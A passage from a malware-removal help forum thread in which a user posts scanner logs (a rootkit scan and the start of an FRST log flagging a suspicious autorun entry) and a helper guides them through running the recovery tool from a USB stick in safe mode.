21:57:07.0144 0x1a10 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys 21:57:07.0184 0x1a10 msdsm - ok 21:57:07.0214 0x1a10 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe 21:57:07.0284 0x1a10 MSDTC - ok 21:57:07.0334 0x1a10 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys 21:57:07.0415 0x1a10 Msfs - ok 21:57:07.0435 0x1a10 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys 21:57:07.0496 0x1a10 mshidkmdf - ok 21:57:07.0526 0x1a10 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys 21:57:07.0556 0x1a10 msisadrv - ok 21:57:07.0604 0x1a10 [ 808E98FF49B155C522E6400953177B08, 
F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll 21:57:07.0691 0x1a10 MSiSCSI - ok 21:57:07.0697 0x1a10 msiserver - ok 21:57:07.0731 0x1a10 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys 21:57:07.0788 0x1a10 MSKSSRV - ok 21:57:07.0881 0x1a10 [ 5ADED2C1239D7BD798E2C4EF9EAA1FA3, 6A462DAC110015F3E59610202714120C557674019A0196680B72031C50D7C474 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe 21:57:07.0931 0x1a10 MsMpSvc - ok 21:57:07.0952 0x1a10 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys 21:57:08.0017 0x1a10 MSPCLOCK - ok 21:57:08.0031 0x1a10 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys 21:57:08.0111 0x1a10 MSPQM - ok 21:57:08.0158 0x1a10 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys 21:57:08.0199 0x1a10 MsRPC - ok 21:57:08.0234 0x1a10 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys 21:57:08.0264 0x1a10 mssmbios - ok 21:57:08.0274 0x1a10 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys 21:57:08.0356 0x1a10 MSTEE - ok 21:57:08.0418 0x1a10 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys 21:57:08.0448 0x1a10 MTConfig - ok 21:57:08.0468 0x1a10 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys 
21:57:08.0518 0x1a10 Mup - ok 21:57:08.0579 0x1a10 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll 21:57:08.0693 0x1a10 napagent - ok 21:57:08.0794 0x1a10 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys 21:57:08.0876 0x1a10 NativeWifiP - ok 21:57:08.0942 0x1a10 [ F7309F42555F8AAB7144A51A1F2585B0, 065277A8AFAEE3888C997A76D2F751070F92DF4C3354D16B194860B4BDAFF937 ] NDIS C:\Windows\system32\drivers\ndis.sys 21:57:09.0032 0x1a10 NDIS - ok 21:57:09.0115 0x1a10 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys 21:57:09.0193 0x1a10 NdisCap - ok 21:57:09.0222 0x1a10 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys 21:57:09.0317 0x1a10 NdisTapi - ok 21:57:09.0338 0x1a10 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys 21:57:09.0407 0x1a10 Ndisuio - ok 21:57:09.0470 0x1a10 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys 21:57:09.0565 0x1a10 NdisWan - ok 21:57:09.0601 0x1a10 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys 21:57:09.0684 0x1a10 NDProxy - ok 21:57:09.0724 0x1a10 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys 21:57:09.0849 0x1a10 NetBIOS - ok 21:57:09.0952 0x1a10 [ 734837208CAFD6E0959A7A0333C95C9D, 
0B7CD6E3CE43ABE021DBE6516492E326265EC0273F2F4297187CE70602CB8CE1 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys 21:57:10.0056 0x1a10 NetBT - ok 21:57:10.0081 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] Netlogon C:\Windows\system32\lsass.exe 21:57:10.0115 0x1a10 Netlogon - ok 21:57:10.0179 0x1a10 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll 21:57:10.0300 0x1a10 Netman - ok 21:57:10.0349 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:57:10.0400 0x1a10 NetMsmqActivator - ok 21:57:10.0409 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:57:10.0447 0x1a10 NetPipeActivator - ok 21:57:10.0500 0x1a10 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll 21:57:10.0603 0x1a10 netprofm - ok 21:57:10.0612 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:57:10.0645 0x1a10 NetTcpActivator - ok 21:57:10.0654 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 21:57:10.0688 0x1a10 NetTcpPortSharing - ok 21:57:10.0722 0x1a10 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys 21:57:10.0789 0x1a10 nfrd960 - ok 21:57:10.0866 0x1a10 [ CE5F6E635FE4506AE6F2D6EB87425128, 
21:57:40.0513 0x1a10 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys 21:57:40.0539 0x1a10 Wd - ok 21:57:40.0618 0x1a10 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys 21:57:40.0673 0x1a10 Wdf01000 - ok 21:57:40.0734 0x1a10 [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiServiceHost C:\Windows\system32\wdi.dll 21:57:40.0813 0x1a10 WdiServiceHost - ok 21:57:40.0821 0x1a10 [ C6F7473B55510F0B93961DA03D8E3B38, 4BAB9274DED8F7AC4A52B8739F501323FFFA0367CAA24BFAFDB5523812E0CE39 ] WdiSystemHost C:\Windows\system32\wdi.dll 21:57:40.0856 0x1a10 WdiSystemHost - ok 21:57:40.0897 0x1a10 [ EE841B6D1F2B9508D3ABAE52AC05A94F, F1AE981FCDBFC4672A4EABABD41382E93762EFC2EDAD96E75530E7ACA5AF1FD8 ] WebClient C:\Windows\System32\webclnt.dll 21:57:41.0040 0x1a10 WebClient - ok 21:57:41.0078 0x1a10 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll 21:57:41.0166 0x1a10 Wecsvc - ok 21:57:41.0190 0x1a10 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll 21:57:41.0284 0x1a10 wercplsupport - ok 21:57:41.0314 0x1a10 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll 21:57:41.0388 0x1a10 WerSvc - ok 21:57:41.0426 0x1a10 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys 21:57:41.0487 0x1a10 WfpLwf - ok 21:57:41.0531 0x1a10 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys 
21:57:41.0558 0x1a10 WIMMount - ok 21:57:41.0598 0x1a10 WinDefend - ok 21:57:41.0611 0x1a10 WinHttpAutoProxySvc - ok 21:57:41.0668 0x1a10 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll 21:57:41.0740 0x1a10 Winmgmt - ok 21:57:41.0842 0x1a10 [ EBDA1B0F15CB9B2CBCC6C94824E4E054, C51314F7D611E4903DA00EFA8EB99365414436324D256083CE0B5A8E055E8E06 ] WinRM C:\Windows\system32\WsmSvc.dll 21:57:42.0021 0x1a10 WinRM - ok 21:57:42.0085 0x1a10 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUSB.sys 21:57:42.0119 0x1a10 WinUsb - ok 21:57:42.0175 0x1a10 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll 21:57:42.0265 0x1a10 Wlansvc - ok 21:57:42.0425 0x1a10 [ 357CABBF155AFD1D3926E62539D2A3A7, C43CFF84E7D930B4999DC061AB0766B57AAD7540B3E6EE54605B10ECE90825F5 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE 21:57:42.0522 0x1a10 wlidsvc - ok 21:57:42.0554 0x1a10 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\drivers\wmiacpi.sys 21:57:42.0585 0x1a10 WmiAcpi - ok 21:57:42.0663 0x1a10 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe 21:57:42.0713 0x1a10 wmiApSrv - ok 21:57:42.0753 0x1a10 WMPNetworkSvc - ok 21:57:42.0778 0x1a10 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll 21:57:42.0830 0x1a10 WPCSvc - ok 21:57:42.0853 0x1a10 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll 21:57:42.0914 0x1a10 WPDBusEnum 
- ok 21:57:42.0961 0x1a10 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys 21:57:43.0030 0x1a10 ws2ifsl - ok 21:57:43.0065 0x1a10 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\System32\wscsvc.dll 21:57:43.0114 0x1a10 wscsvc - ok 21:57:43.0121 0x1a10 WSearch - ok 21:57:43.0281 0x1a10 [ 88009DB9E1166B6B6713A858C176FECD, CBF4C63D3C5D14AF3C3F0D9C48E5AC9E7A4323BFB0363E9948FD801963BE1467 ] wuauserv C:\Windows\system32\wuaueng.dll 21:57:43.0440 0x1a10 wuauserv - ok 21:57:43.0483 0x1a10 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys 21:57:43.0530 0x1a10 WudfPf - ok 21:57:43.0563 0x1a10 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys 21:57:43.0614 0x1a10 WUDFRd - ok 21:57:43.0649 0x1a10 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll 21:57:43.0693 0x1a10 wudfsvc - ok 21:57:43.0742 0x1a10 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll 21:57:43.0799 0x1a10 WwanSvc - ok 21:57:43.0882 0x1a10 ================ Scan global =============================== 21:57:43.0901 0x1a10 [ 168EA9CD9BD6056BB6F60B57D5304BBE, 5A2F98754F042A7D80E7483842967EB362F01D57CE9720B24C7EDAA047F24C6F ] C:\Windows\system32\basesrv.dll 21:57:43.0943 0x1a10 [ 100788FE26FF7A1E530DD2A7ABE855F1, 64FDD30D7986AB41E0A545558AB8F93D5B1AEDF5ACE4F40B9C7B1FB3A59442AA ] C:\Windows\system32\winsrv.dll 21:57:43.0987 0x1a10 [ 100788FE26FF7A1E530DD2A7ABE855F1, 64FDD30D7986AB41E0A545558AB8F93D5B1AEDF5ACE4F40B9C7B1FB3A59442AA ] C:\Windows\system32\winsrv.dll 
21:57:44.0024 0x1a10 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll 21:57:44.0053 0x1a10 [ 71C85477DF9347FE8E7BC55768473FCA, A86D6A6D1F5A0EFCD649792A06F3AE9B37158D48493D2ECA7F52DCC1CB9B6536 ] C:\Windows\system32\services.exe 21:57:44.0064 0x1a10 [ Global ] - ok 21:57:44.0065 0x1a10 ================ Scan MBR ================================== 21:57:44.0081 0x1a10 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0 21:57:44.0330 0x1a10 \Device\Harddisk0\DR0 - ok 21:57:44.0331 0x1a10 ================ Scan VBR ================================== 21:57:44.0342 0x1a10 [ 04D41694496FA4ECA64A00A565FC60E0 ] \Device\Harddisk0\DR0\Partition1 21:57:44.0344 0x1a10 \Device\Harddisk0\DR0\Partition1 - ok 21:57:44.0348 0x1a10 [ D4FB2BC6D3C50D0FBCDC64AE579D412A ] \Device\Harddisk0\DR0\Partition2 21:57:44.0350 0x1a10 \Device\Harddisk0\DR0\Partition2 - ok 21:57:44.0357 0x1a10 [ 70F217D8BCDAE04538AC7579C0FC2AC0 ] \Device\Harddisk0\DR0\Partition3 21:57:44.0359 0x1a10 \Device\Harddisk0\DR0\Partition3 - ok 21:57:44.0365 0x1a10 [ E37218F946EDA4769414F09058FD221E ] \Device\Harddisk0\DR0\Partition4 21:57:44.0366 0x1a10 \Device\Harddisk0\DR0\Partition4 - ok 21:57:44.0368 0x1a10 ================ Scan generic autorun ====================== 21:57:44.0449 0x1a10 [ 053C93D5967E08748DBA0E132EAEC0B3, B48A00B00DFDFCF6911911B34788CD359BF90AB66F4A2A3FE177B75EB775C2C2 ] C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe 21:57:44.0460 0x1a10 NUSB3MON - detected UnsignedFile.Multi.Generic ( 1 ) 21:57:45.0067 0x1a10 Detect skipped due to KSN trusted 21:57:45.0067 0x1a10 NUSB3MON - ok 21:57:45.0364 0x1a10 [ 074B2C777090821E020B404AF5BF97AD, 26DF9B3A153B2BCB6ED4DBB66CC9429790854095439119A618B05ECEBFB31F12 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe 21:57:45.0619 0x1a10 RTHDVCPL - ok 21:57:45.0768 0x1a10 [ 7A727248EBC065BD2BB94A9B2892D190, 
B1E12ED3D07963EF0FA09B3ECD8AC3FBD316733D968A99C958DF7026B1BDFD99 ] c:\Program Files\Microsoft Security Client\msseces.exe 21:57:45.0843 0x1a10 MSC - ok 21:57:45.0847 0x1a10 SynTPEnh - ok 21:57:45.0910 0x1a10 [ A0FA8D8D7AF03BC5D77436D6F807E397, 817978E2183AC509BB877935660CD9436AF7C70ED8A94FC93426AF3DC9EC0127 ] C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe 21:57:45.0939 0x1a10 AccelerometerSysTrayApplet - ok 21:57:45.0992 0x1a10 [ 6198A9BC15ED77F318D5DDD1918CF1D1, 6C7E619BB053F09021F5867E3A70A3A2890E2318CF1A5CE294A5F894CB3A4890 ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe 21:57:46.0031 0x1a10 HP Quick Launch - ok 21:57:46.0085 0x1a10 [ FCEC6F664FA7E5FE323165FBC9314470, 4E5AB1E6C3D2881D95E74F2F28649A7DBC4919CA249829A0E4CD9804E401A025 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe 21:57:46.0129 0x1a10 SunJavaUpdateSched - ok 21:57:46.0162 0x1a10 [ C06484BCD75F743FA2671A96EB47B28C, F17BDE8C4F9A0930BD423B4E4334F3916F47C54A78D8C799FB641196B6F18833 ] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe 21:57:46.0198 0x1a10 HPOSD - ok 21:57:46.0289 0x1a10 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe 21:57:46.0411 0x1a10 Sidebar - ok 21:57:46.0457 0x1a10 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe 21:57:46.0513 0x1a10 mctadmin - ok 21:57:46.0549 0x1a10 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe 21:57:46.0617 0x1a10 Sidebar - ok 21:57:46.0627 0x1a10 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe 21:57:46.0666 0x1a10 mctadmin - ok 21:57:46.0773 0x1a10 [ 687C288D76E984B7B6F5F8CA6D5BC030, 
21:57:46.0773 0x1a10 [ 687C288D76E984B7B6F5F8CA6D5BC030, 3CFDE8C579F8D06FF919DE07F831E6A29EE7C9416911B547A2EC196D0945D257 ] C:\Users\XXXXXXXX\AppData\Local\Jwixfip\rxarbalcy.bqezd
21:57:47.0104 0x1a10 - detected UnsignedFile.Multi.Generic ( 1 )
21:57:47.0814 0x1a10 ( UnsignedFile.Multi.Generic ) - warning
21:57:47.0821 0x1a10 Waiting for KSN requests completion. In queue: 166
21:57:48.0872 0x1a10 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.10.209.0 ), 0x61000 ( enabled : updated )
21:57:48.0921 0x1a10 Win FW state via NFP2: enabled ( trusted )
21:57:49.0380 0x1a10 ============================================================
21:57:49.0380 0x1a10 Scan finished
21:57:49.0380 0x1a10 ============================================================
21:57:49.0392 0x1a08 Detected object count: 1
21:57:49.0392 0x1a08 Actual detected object count: 1
21:58:30.0244 0x1a08 ( UnsignedFile.Multi.Generic ) - skipped by user
21:58:30.0244 0x1a08 ( UnsignedFile.Multi.Generic ) - User select action: Skip

I managed to download Farbar's Recovery Scan Tool with IE, but when I run it as admin it opens only briefly and closes again before I can do anything. So no chance for step #1.
As I said, only Windows Firewall is running here and no AVs. I also disabled the firewall, same result. IE at least allows the download (without closing the browser and restarting Windows) but considers the file extremely suspicious.
OK, I hope you will get back to me again.
Sorry, I only just read this: "As a rule I reply to you within 24 hours, often considerably faster. However, I too have a regular job and a family. I am therefore not here in the forum for hours every day. Under some circumstances it can take up to 2 days before you get a reply from me. If that time has passed, you are welcome to send me a PM as a reminder."
Last edited by ranxero (01.10.2017 at 21:06) |
02.10.2017, 19:47 | #8 |
/// TB-Ausbilder | Anti-malware programs no longer start
Hi, download FRST on a clean computer onto a USB stick and connect the USB stick to the affected computer. Start FRST from there. |
02.10.2017, 19:53 | #9 |
| Anti-malware programs no longer start
OK, but I can't do that until tomorrow. I'll get back to you then. Thanks a lot again. |
02.10.2017, 20:49 | #10 |
/// TB-Ausbilder | Anti-malware programs no longer start
OK, see you then. |
03.10.2017, 14:30 | #11 |
| Anti-malware programs no longer start
It doesn't work. I downloaded FRST onto 2 USB sticks, once from a clean computer, the other from an internet café; everything went without problems, no security messages etc. One stick was used, the other is completely new ... I tried to start FRST from both sticks. Same effect: the program comes up briefly and is then immediately gone again. No chance of starting anything. |
03.10.2017, 15:12 | #12 |
/// TB-Ausbilder | Anti-malware programs no longer start
Hi, we can still try to start FRST in repair mode from the USB stick: Scan with Farbar's Recovery Scan Tool (Recovery Mode - Windows Vista, 7, 8)
Notes for Windows 8 users: Guide 1 (FRST variant) and Guide 2 (second part) |
03.10.2017, 21:47 | #13 |
| Anti-malware programs no longer start
Hehe, it worked. I found the list a bit confusing. Maybe for others reading along, here is the procedure under Win7:
#1 Restart the computer.
#2 While it boots, press the F8 key several times.
#3 Select Safe Mode with Command Prompt using the arrow keys and press Enter ... Windows then starts in safe mode.
#4 Log in as normal ... the black command prompt comes up.
-> Now type notepad and press Enter.
-> In the text document that opens: File > Save As... and select Computer. The drive letter of your USB stick is shown here; remember it.
-> Close Notepad again.
-> Now enter the following command: e:\frst.exe or e:\frst64.exe
Note: e stands for the drive letter of your USB stick that you remembered. Adjust if necessary.
-> Accept the disclaimer with Yes and click Scan.
Here is my FRST.txt
FRST Logfile: Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-10-2017 01
durchgeführt von xxxxxx (Administrator) auf xxxxxxPC (03-10-2017 22:16:57)
Gestartet von F:\
Geladene Profile: xxxxxx (Verfügbare Profile: xxxxxx)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Safe Mode (minimal)
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [NUSB3MON] => C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe [97280 2012-04-11] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7546072 2014-03-10] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3935400 2015-07-06] (Synaptics Incorporated)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-02-07] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [380680 2014-08-20] (Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\Run: [*Soxfevi<*>] => "C:\Users\xxxxxx\AppData\Local\Jwixfip\rxarbalcy.bqezd" <==== ACHTUNG (Wertname mit invaliden Zeichen)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\MountPoints2: {543c64fc-fbab-11e4-bf1a-2c337a7e62aa} - G:\SETUP.EXE
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk [2015-05-17]
ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bitmeter2.lnk [2017-09-22]
ShortcutTarget: Bitmeter2.lnk -> C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

